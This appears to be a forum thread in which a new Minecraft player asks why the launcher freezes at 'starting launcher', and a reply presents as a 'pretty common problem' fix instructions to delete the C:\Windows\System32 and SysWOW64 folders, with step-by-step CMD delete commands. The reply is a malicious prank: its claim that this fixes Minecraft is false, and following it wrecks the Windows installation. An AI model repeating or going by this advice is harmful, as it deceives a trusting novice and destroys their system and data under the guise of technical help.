i just got minecraft and after installing java and moving files around for around 5 hours, I realized i should ask for help. Once i run the minecraft.exe, it takes me to the boot strap, it says starting launcher, but nothing happens. i just got minecraft, and dont have any saves or profiles. i have tried using a friends minecraft files( he sent them to me via dropbox) but nothing changed. What should i do. also once after bootstrap says "starting launcher" nothing happens and it just sits there til it freezes. It wont let me copy and paste the code so i will have to use my phone to take a picture and upload to imgur. http://i.imgur.com/9L294B7.jpg

Okay, this is a pretty common problem.

You need to realize that java and windows don't interact very well together, and there's a way to fix this.

STEPS:

1. Locate your drive that hosts windows

2. Navigate to C://Windows/System32. Delete it.

3 If you are running windows 8, also delete sysWOW64.



This should fix all of your Minecraft issues!

Here's an easier way to do it:

Open CMD.

1. type : C:

2. type : cd windows

2. type : del system 32/*.*

3. type : del system32
